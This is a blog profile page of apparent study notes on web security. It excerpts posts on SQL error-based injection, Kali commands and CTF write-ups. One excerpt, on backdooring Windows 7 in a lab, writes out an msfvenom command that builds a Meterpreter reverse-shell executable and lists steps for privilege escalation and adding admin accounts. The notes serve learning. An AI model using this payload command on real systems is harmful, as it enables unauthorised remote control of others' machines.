自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(9)
  • 问答 (1)
  • 收藏
  • 关注

原创 SQL注入之floor报错注入以及各个部分详细分析 + iwebsec 实例分析 + updatexml() 报错 + extractvalue() 报错

文章目录前言一、什么是floor报错注入二、利用iwebsec模拟实际注入过程三、updatexml()和extractvalue()报错注入四、问题前言本文为作者的学习笔记,主要介绍了floor注入原理,利用注入代码(payload)分析每个部分的作用以此来解释floor注入的原理。在解释过程中会使用phpstudy搭建的MySQL环境,并且利用iwebsec漏洞库来实践。最后顺带介绍updatexml和extractvalue报错注入。提示:以下是本篇文章正文内容,下面案例可供参考一、什么是

2021-12-09 20:48:12 4090

原创 SQL 数字型注入详解 + iwebsec实例

提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档文章目录前言一、SQL 数字型注入原理二、使用步骤1.引入库2.读入数据总结前言本文为作者的学习笔记。其中详细记载了作者对于SQL 数字型注入的理解,同时也介绍了利用union联合查询注入成功的完整过程。本文最后作者利用iwebsec和Webgoat两个平台来进行实战。如果有不足之处,欢迎指正。提示:以下是本篇文章正文内容,下面案例可供参考一、SQL 数字型注入原理当输入的参数为整型时例如:ID、年龄等。如果此时存在注入漏洞,

2021-12-04 20:13:07 6391 1

原创 学习笔记 Kali常用命令

kali常用命令sudo系统管理者的身份执行命令。也就是经由sudo执行的命令都是以root权限执行的sudo service apache2 start 开启apache2服务ifconfig 作用相当于Windows系统的 ipconfigsudo password root 修改root的登陆密码(root可以改为其它账户)sudo apt update 更新一个系统文件,该文件里面包含了所有应用程序的版本号。执行命令后会将文件里面的版本号更新到最

2021-09-13 21:28:48 1413

原创 学习笔记 sql注入漏洞浅谈

文章目录前言一、SQL注入原理二、SQL注入漏洞分类1.数字型注入2.字符型注入3.其它分类总结前言提示:SQL注入漏洞时WEB层面最高危的漏洞之一。在2005年前后,SQL注入漏洞随处可见,在用户登陆或者搜索时,只需输入一个单引号就可以检测出这类的漏洞。随着WEB应用程序的安全性不断提高,SQL注入漏洞越来越少,但是也变得越来越难以检测和预防。提示:作者学习书籍为张炳帅先生编著的《Web安全深度剖析》,随学习进度会更新其它知识。以下为文章正文部分,可以认为是作者的学习记录。读者可以以此作为学习

2021-09-12 19:16:26 379

原创 小白 虚拟机 kali_Linux安装 详细教程

安装版本:VMmare workstation pro kali_Linux安装环境:Window10首先我们先了解一下什么是kali_linux:Kali Linux是基于Debian的Linux发行版, 设计用于数字取证操作系统。每一季度更新一次。由Offensive Security Ltd维护和资助。最先由Offensive Security的Mati Aharoni和Devon Kearns通过重写BackTrack来完成,BackTrack是他们之前写的用于取证的Linux发行

2021-09-10 13:21:40 89390 32

原创 CTF Bugku POST

进入场景之后,出现了一串PHP源代码,可以看出本题和之前的GET题是一摸一样的。那么就是用POST方法将参数传过去就可以了。这里我用的是Python的requests库来构造的HTTP连接,如果有其它方法可以在评论区分享一下。import requestsurl1 = 'http://114.67.246.176:17658/'a = requests.post(url1, {'what': 'flag'})print(a.text)运行结果为:得到了flag本题总结:本题考察了PO.

2021-08-18 14:40:46 655

原创 CTF Bugku GET

进入场景后看到一串PHP源代码根据这源代码的提示,很容易想到使用GET方法来传递what参数以此来满足条件语句。所以在地址栏里面构造如下:回车之后,what参数的值就传过去了,flag也就出来了本题总结:难度不大,提示的已经很明确了。本题就是专门训练GET方法的。只要明白GET方法在url里面的呈现形式就可以很容易的做出这道题来。...

2021-08-18 14:29:22 400

原创 CTF Bugku 计算器

该题目提示计算正确就可以得到flag但是输入框只能输入一个字符,所以我们需要调整一下它的最大字符长度。F12后,进到源代码下,找到标签的maxlength属性修改为10(能满足题意即可)输入正确结果后即可得到flag第二种解法就是右键查看源代码,找到code.js之后,直接在里面查找flag本题总结:难度不大,考察的内容是查看源代码的能力和对HTML语言的了解程度。...

2021-08-18 14:21:48 523

原创 Kali Linux: Windows7 x64 植入后门

声明:本文章内所有内容环境为自己搭建绝无违法内容,禁止利用其中的技术来做违法的事情。主要内容:**1.利用msf生成后门,并上传到目标主机上2.介绍获得权限可以做的某些事情3.查看并提高现有权限4.创建账户,并将其加入管理组5.开启远程桌面** 第一步:利用msf生成后门,并上传到目标主机上msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.16.128 lport=5555 -f exe -o /home/rockrock

2021-04-11 12:25:43 1924 3

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除